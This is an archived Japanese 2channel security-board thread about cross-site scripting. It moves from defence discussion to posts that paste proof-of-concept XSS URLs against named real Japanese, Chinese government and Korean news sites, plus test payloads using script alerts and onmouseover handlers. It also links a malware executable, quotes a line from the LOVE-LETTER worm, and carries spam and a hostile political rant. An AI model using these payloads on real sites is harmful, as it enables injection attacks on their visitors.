クロスサイトスクリプティング

1 ：名無しさん＠お腹いっぱい。：01/10/27 14:33.net

http://securit.etl.go.jp/research/paper/css2001-takagi-dist.pdf
案外対策取られてないものですね。
クライアントサイドからもサーバサイドからも両面で対策しないと
まずいですね。
皆さんはどんな対策とってますか？

94 ：名無しさん＠お腹いっぱい。：03/10/19 22:37.net

>>93
Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に
[ b ]が存在した場合には，それらに対するエスケープ処理をWebサーバが
実施しなければならないといったことがあります。

bに相当するのは普通「スクリプト」だと思うんだが、解答群に無かったよな。

95 ：名無しさん＠お腹いっぱい。：03/10/19 23:44.net

>>94
メタキャラクタでいいんじゃない？
要は不等号をタグとして扱わなければいい訳だし。

96 ：95：03/10/20 07:16.net

>>95
うん。漏れもメタキャラクタにしたんだけどXSS対策に限定すると
何か回答としてはイマイチだなぁと。

97 ：名無しさん＠お腹いっぱい。：03/10/27 21:29.net

総務省お抱えのcrowechizekはFlash,HTML両バージョンともダメダメ。
Flashでは応答返ってこないし、HTMLでは文字大きくなるし。
"<H1>No medicine can cure a fool</H1>

98 ：名無しさん＠お腹いっぱい。：03/10/28 22:43.net

↑IIS?

99 ：名無しさん＠お腹いっぱい。：03/10/30 10:56.net

> Webブラウザからのリクエストに対してWebサーバが返すWebコンテンツ中に

リクエストに対して返すコンテンツ中のメタキャラクタを全部エスケープしち
まったら、HTMLが全部ソースで見えちまうだろ。大丈夫か、その試験。

100 ：名無しさん＠お腹いっぱい。：03/10/30 11:00.net

>>94
スクリプト を エスケープする とは言わない。
エスケープする対象として日本語的に適切な選択肢を選べば回答できる。

他にはどんな選択肢があったの？

101 ：名無しさん＠お腹いっぱい。：04/01/07 12:29.net

最近話題にもならなくなったな

102 ：名無しさん＠お腹いっぱい。：04/02/04 00:16.net

クッキーで個人情報を保存するのはどう？
↓使ってみようかと思ってますが大丈夫でしょうか
ttp://resume.meieki.com/

103 ：名無しさん＠お腹いっぱい。：04/02/04 00:32.net

URLにスクリプト仕込むのはTHEBBSの人たちが既にやってる
http://hack.dot.thebbs.jp/1068805016.html
JavascriptをいったんString.fromCharCode化してしまえば
全タグ有効っつーかなんでもできるらしい

104 ：名無しさん＠お腹いっぱい。：04/04/11 21:36.net

ぱおぱおクッキー

105 ：名無しさん＠お腹いっぱい。：04/04/11 23:30.net

2chにもクロスサイトスクリプティング脆弱性は結構あるよ。

106 ：名無しさん＠お腹いっぱい。：04/04/12 08:53.net

言うだけなら誰でも出来る罠

107 ：名無しさん＠お腹いっぱい。：04/04/12 11:29.net

>>106
実際にやるとどこかのおバカさんみたいに
ムショに連行される罠ｗ

108 ：名無しさん＠お腹いっぱい。：04/04/12 13:29.net

と言い訳をして具体例も挙げられない馬鹿もいるようで。

109 ：名無しさん＠お腹いっぱい。：04/05/09 23:56.net

>>107
俺はﾊｯｶｰだから鯖落としたりできるぜ！　でも捕まるからやらない

ってな。捕まらないようにできない奴は単なる厨房
足跡ベタベタ残してならF5押してる馬鹿と同じ

110 ：名無しさん＠お腹いっぱい。：04/08/08 21:34.net

最近落ち着いた？

111 ：名無しさん＠お腹いっぱい。：04/09/16 16:51:06.net

みたいだね

112 ：名無しさん＠お腹いっぱい。：04/10/18 10:27:10.net

懐かしいね

113 ：名無しさん＠お腹いっぱい。：04/11/19 17:45:06.net

想定される被害で考えたらXSSは「だからなに？」って程度のもんだよ。
Phishingに使われちゃうとかだろうな、今だと。
あとあれか、「XSSほっといてるってコトは他にも穴がバンバンあるだろうーな」
「この会社はセキュリティ対策してねーな」って思われちゃう位だろうか。

114 ：名無しさん＠お腹いっぱい。：05/01/02 11:52:43.net

115 ：名無しさん＠お腹いっぱい。：2005/05/19(木) 16:29:50 .net

質問させてください。
クロスサイトスクリプティングに関して、概要や対策を紹介したページは多々あるんですが、
実際自分のWEBサイトが攻撃の踏み台にされたかどうかの確認する方法ってあるんでしょうか？
つまりWEBサイト上に形跡が残るものかどうかということを知りたいです。

116 ：名無しさん＠お腹いっぱい。：2005/07/08(金) 16:40:25 .net

あっそ

117 ：名無しさん＠お腹いっぱい。：2005/07/24(日) 15:08:01 .net

ネクラヒッキーのみんなー
夏は出会いの季節！夏を盛り上げる為にも、ココで女の子と出会って仲良くなろう♪
http://www.pretty-love.com/de.php

118 ：名無しさん＠お腹いっぱい。：2005/08/03(水) 00:00:59 .net

●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●

ウイルス対策ソフトの検出力結果
http://www.geocities.jp/stealrush/security.html

●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●

119 ：名無しさん＠お腹いっぱい。：2006/06/03(土) 15:48:50 .net

先日、中国人らしいハッカーにＶＮＣの脆弱性をりようされ
ＰＣに進入を許してしまいました。
これは、ハッカーがＩＥの履歴に残していったＥＸＥなんですが
http://mysky.6600.org/yx/gz.exe
偉い方、なにをするものか教えてください

120 ：名無しさん＠お腹いっぱい。：2007/04/05(木) 16:35:01 .net

ttp://hyocom.jp/b_search.php
ここのキーワード検索は、XSSなんでしょうか？

121 ：名無しさん＠お腹いっぱい。：2007/11/04(日) 11:30:26 .net

ttp://www.brooks.co.jp/index.php

ヤバイなこのサイト・・・

122 ：名無しさん＠お腹いっぱい。：2008/06/03(火) 21:25:27 .net

>>119
メール送信ワームが作成する圧縮ユーティリティ
ワームが自分自身を圧縮してKellyOsbourne.com.gzという
ファイルを作るためのもの。
早い話がワームがすでに実行されたことを意味するよ。

123 ：名無しさん＠お腹いっぱい。：2008/06/05(木) 00:12:08 .net

２年物の自演てすごいよな

124 ：名無しさん＠お腹いっぱい。：2009/04/05(日) 21:36:40 .net

ttp://poke.ula.cc/pcview.cgi/%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://h.ula.cc/dance/?kenken=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://same.ula.cc/test/r.so/%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
ttp://unkar.jp/2ch/search.php?q=%22%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E
ttp://mail-cafe.tv/p/top/index2.php?c=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://idol.mp3torrent.org/%22%3E%3Ciframe%20src=/%3E%3C/iframe%3E/index.html
ttp://www.nikkanberita.com/search.cgi?w=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

ttp://sousuo.gov.cn/pagephoto?photopage=cn%2Fphoto.jsp&channelid=3001&searchword=YouTube&url=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://sbj.saic.gov.cn/english/show.asp?id=460&bm=%27%3E%3Ciframe%3E
ttp://www.stats.gov.cn/was40/reldetail.jsp?docid=%22%3E%3Ciframe%3E%3C/iframe%3E

ttp://japanese.joins.com/search/japanese.php?query=kim%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://world.kbs.co.kr/english/news/news_Po_detail.htm?No=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://joongangdaily.joins.com/search/index.html?query=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://chinese.joins.com/gb/series.do?method=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://chinese.joins.com/big5/article.do?method=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://photo.english.chosun.com/dailyNews/view.do?category=2&gubun=ENG?gubun=daily_news_item&idx=%22%3E%3Ciframe%3E%3C/iframe%3E
ttp://news.chosun.com/svc/list_in/list.html?catid=%22%3E%3Ciframe%3E%3C/iframe%3E

125 ：名無しさん＠お腹いっぱい。：2009/06/12(金) 03:34:55 .net

http://pc11.2ch.net/test/read.cgi/sec/1004160822/l50

126 ：名無しさん＠お腹いっぱい。：2009/06/12(金) 03:35:14 .net

http://pc11.2ch.net/test/read.cgi/sec/1004160822/l50

127 ：名無しさん＠お腹いっぱい。：2010/09/05(日) 10:10:20 .net

うーん

128 ：名無しさん＠お腹いっぱい。：2011/01/10(月) 14:03:21 .net

C.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.VBS")

129 ： 忍法帖【Lv=40,xxxPT】(5+0：8) 【29.4m】 電脳プリオン ◆3YKmpu7JR7Ic ：2013/01/09(水) 22:34:04.13 ?PLT(12079).net

　　∧＿∧
　 （　・∀・）　　　|　|　ｶﾞｯ
　と　　　　）　 　 |　|
　　 Ｙ　/ノ　　　 人
　　　 /　）　 　 < 　>__Λ∩
　 ＿/し'　／／. Ｖ｀Д´）/ ←>>81
　（＿フ彡　　　　　 　　/

130 ： 忍法帖【Lv=3,xxxP】(1+0：8) ：2013/01/11(金) 02:49:36.70 .net

test

131 ：名無しさん＠お腹いっぱい。：2013/01/24(木) 21:26:51.65 .net

過疎スレがこんなところにも。

132 ：名無しさん＠お腹いっぱい。：2013/02/09(土) 00:06:11.18 .net

タグを使えないネトゲのマイページのプロフィール欄に
外部のブログパーツのスクリプトを引っ張ってきたいのですが、
どのようにやればいいのでしょうか。
ご教示いただけますか？

ほかの人のやっているののソースを見ると、
アンカーが二重<<>>になっているだけのようなのですが
それで書き込んでもはじかれてしまいます。

しらべてみて、文字コードによるハック？ということまでたどりついたのですが
実際のやり方がわかりません。

詳しい方おしえてください。よろしくお願いします。

133 ：名無しさん＠お腹いっぱい。：2013/10/19(土) 22:46:39.70 .net

<script>alert(1);</script>
<script>alert("a");</script>
>>javascript:alert(1)

134 ：名無しさん＠お腹いっぱい。：2013/10/19(土) 22:47:43.23 .net

>>1javascript:alert(1)

135 ：名無しさん＠お腹いっぱい。：2013/10/19(土) 22:49:48.21 .net

>>000

136 ：名無しさん＠お腹いっぱい。：2013/10/19(土) 22:55:12.82 .net

onmouseover='alert(1)'

137 ：名無しさん＠お腹いっぱい。：2013/10/19(土) 22:56:16.74 .net

onmouseover=alert(1)//

138 ：名無しさん＠お腹いっぱい。：2013/10/20(日) 06:48:52.86 .net

" onmouseover="alert(1)

139 ：名無しさん＠お腹いっぱい。：2013/12/22(日) 01:29:23.82 .net

test
<iframe style='display:none'><script>alert(1)</script></iframe>

140 ：javascript:alert(8)：2014/07/19(土) 22:32:41.10 .net

'>"><hr>

141 ：名無しさん＠お腹いっぱい。：2014/09/21(日) 22:34:21.41 .net

そりゃそうだ

142 ：名無しさん＠お腹いっぱい。：2015/12/16(水) 15:51:32.92 .net

ftp%3A//

143 ：名無しさん＠お腹いっぱい。：2022/09/10(土) 10:00:49.67 ID:P49LwsCxU

観光（笑）は産業て゛はなく、共有財産である地球を破壞して気侯変動させて災害連発させて私腹を肥やす強盜殺人と同類なわけた゛が．
この羞恥心の欠片もない物乞い乞食と゛もが生きなか゛らえる唯─の手段は、
ＪＡＬた゛のÅΝÅだのクソアイ又ト゛ゥた゛のクサイマ━クた゛のコ゛キブリフライヤーた゛のテロリス ├に敵対して．
土砂崩れに洪水，暴風．猛暑．大雪にと気候変動による被害を受けた連中とともにコ口ナ被害含めて集団損害賠償請求訴訟することだろ
航空機を使わない程度の旅行ならこれた゛け自然様もフ゛チキ゛レることもないだろうに、
都心まで数珠つなぎて゛騷音にコロナに温室効果ガスにとまき散らして国土破壊して住民を殺しながら私腹を肥やしていやがるし．
クソ航空機は国土と經済を破壞して國民の知能まて゛低下させて益々後進國にするだけのテ囗兵器た゛といい加減、氣づけや腐敗の権化自民公明

創価学會員は、何百万人も殺傷して損害を与えて私腹を肥やし続けて逮捕者まて゛出てる世界最悪の殺人腐敗組織公明党を
池田センセ―か゛囗をきけて容認するとか本氣で思ってるとしたら侮辱にもほどか゛あるぞ！
ｈтＴＰｓ：／／ｉ．ｉｍｇｕｒ．ｃоｍ／hnli1ga.jpeg